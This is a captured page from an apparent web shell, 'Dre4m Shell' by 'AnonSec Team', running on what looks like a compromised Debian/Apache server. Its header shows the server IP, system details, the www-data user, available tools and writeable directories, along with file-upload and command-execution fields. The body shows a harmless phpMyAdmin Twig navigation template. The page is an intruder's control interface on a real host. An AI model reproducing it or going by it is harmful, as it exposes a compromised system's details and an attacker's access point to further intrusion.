Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.145.8.188
Web Server : Apache/2.4.61 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/wordpress/phpMyAdmin/templates/display/results/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/wordpress/phpMyAdmin/templates/display/results/table_navigation.twig
<table class="navigation nospacing nopadding print_ignore">
  <tr>
    <td class="navigation_separator"></td>
    {{ move_backward_buttons|raw }}
    {{ page_selector|raw }}
    {{ move_forward_buttons|raw }}
    {% if number_total_page > 1 %}
      <td><div class="navigation_separator">|</div></td>
    {% endif %}
    {% if has_show_all %}
      <td>
        <form action="sql.php" method="post">
          {{ get_hidden_fields(hidden_fields|merge({
            'session_max_rows': session_max_rows,
            'pos': '0'
          })) }}
          <input type="checkbox" name="navig" id="showAll_{{ unique_id }}" class="showAllRows" value="all"
            {{- is_showing_all ? ' checked' }}>
          <label for="showAll_{{ unique_id }}">{% trans 'Show all' %}</label>
        </form>
      </td>
      <td><div class="navigation_separator">|</div></td>
    {% endif %}
    <td>
      <div class="save_edited hide">
        <input class="btn btn-link" type="submit" value="{% trans 'Save edited data' %}">
        <div class="navigation_separator">|</div>
      </div>
    </td>
    <td>
      <div class="restore_column hide">
        <input class="btn btn-link" type="submit" value="{% trans 'Restore column order' %}">
        <div class="navigation_separator">|</div>
      </div>
    </td>
    <td class="navigation_goto">
      {# if displaying a VIEW, $unlim_num_rows could be zero because #}
      {# of $cfg['MaxExactCountViews']; in this case, avoid passing #}
      {# the 5th parameter to Functions.checkFormElementInRange() #}
      {# (this means we can't validate the upper limit) #}
      <form action="sql.php" method="post" onsubmit="return (Functions.checkFormElementInRange(this, 'session_max_rows', '
        {{- '%d is not valid row number.'|trans|replace({'\'': '\\\''}) -}}
        ', 1) && Functions.checkFormElementInRange(this, 'pos', '
        {{- '%d is not valid row number.'|trans|replace({'\'': '\\\''}) -}}
        ', 0
        {{- unlim_num_rows > 0 ? ', ' ~ (unlim_num_rows - 1) -}}
        ));">

        {{ get_hidden_fields(hidden_fields|merge({
          'pos': pos
        })) }}

        {% trans 'Number of rows:' %}

        {{ get_dropdown(
          'session_max_rows',
          {
            '25': 25,
            '50': 50,
            '100': 100,
            '250': 250,
            '500': 500,
          },
          max_rows,
          '',
          'autosubmit',
          is_showing_all ? 'All'|trans
        ) }}
      </form>
    </td>
    <td class="navigation_separator"></td>
    <td class="largescreenonly">
      <span>{% trans 'Filter rows' %}:</span>
      <input type="text" class="filter_rows" placeholder="
        {%- trans 'Search this table' %}" data-for="{{ unique_id }}">
    </td>
    <td class="largescreenonly">
      {{ sort_by_key|raw }}
    </td>
    <td class="navigation_separator"></td>
  </tr>
</table>

Anon7 - 2022
AnonSec Team